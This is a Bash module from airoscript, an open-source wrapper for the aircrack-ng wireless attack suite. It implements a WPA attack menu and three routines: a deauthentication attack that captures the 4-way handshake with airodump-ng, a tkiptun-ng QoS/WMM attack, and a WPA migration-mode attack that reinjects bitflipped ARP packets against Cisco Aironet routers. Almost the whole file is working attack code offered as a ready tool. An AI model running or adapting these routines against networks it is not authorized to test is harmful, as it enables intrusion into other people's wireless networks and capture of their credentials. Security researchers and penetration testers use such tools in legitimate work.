# Wpa attack functions for airoscript # Copyright (C) 2011 David Francos Cuartero # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # Warning! at least generic, internal and interface must be loaded before this one! check_function auth_attacks_fake || source $path/attacks/auth # It depends on auth module ;) check_function wep_attacks || source $path/attacks/wep wpa_attacks(){ hardclean && $clear attack=$1; shift; wpa_attacks_$attack $@ notification=$attack_notification } wpa_attacks_menu(){ help_fifo $"${mark}${red}WPA attacks${end}\n"\ "You're seeing this menu because the network you selected has WPA encryption\n"\ "${red}Standard deauth attack${end}\n"\ "Deauths a client, then waits for the client to reconnect and tries to capture the 4-way handshake\n"\ "${red}QOS attack${end}\n"\ "Launches tkiptun-ng to try to crack some vulnerable accesspoints to the wmm stuff\n"\ "${red}WPA Migration Mode attack${end}\n"\ "This attack targets on Cisco Aironet routers, wich set both WPA and WEP encriptions on the same sssid\nIt listens for a wep-encapsulated arp packet and retransmits it (bitflipped to make it into an ARP coming from the attacker's MAC)" while true; do $clear; mkmenu $"Select WPA Attack" $"Standard attack" $"Standard attack with QoS (WMM)" $"WPA migration mode" $"Return to main menu" case $choice in 1) wpa_attacks handshake; $clear; break;; 2) wpa_attacks qos; $clear; break;; 3) wpa_attacks wpamm; $clear; break;; 4) $clear; break;; esac done } wpa_attacks_wpamm(){ { Host_ENC="WEP"; wep_attacks fakeauto & { AUTO=2; choice=3; othersinjectmenu; AUTO=0; $clear; }; $clear; } && Host_ENC="WPA"; $clear; echo; $clear; } wpa_attacks_handshake(){ [[ $dynamic_client_selection ]] && { auto_scan_clients; select_client; } [[ $Client_MAC != "" ]] && { directed=1; } export time_=0; execute $"Capturing data on channel: $Host_CHAN" $AIRODUMP --ignore-negative-one -w $DUMP_PATH/$Host_MAC --bssid $Host_MAC --channel $Host_CHAN -a $wifi export time_=1 [[ $directed == 1 ]] && choose_deauth 2 [[ $directed != 1 ]] && choose_deauth 3 } wpa_attacks_qos(){ iwconfig $wificard channel $Host_CHAN # Hope this is ok for all cards export time_=0; execute $"Executing tkiptun-ng for ap $Host_MAC" $TKIPTUN -h $FAKE_MAC -a $Host_MAC -m $TKIPTUN_MIN_PL -n $TKIPTUN_MAX_PL $wifi }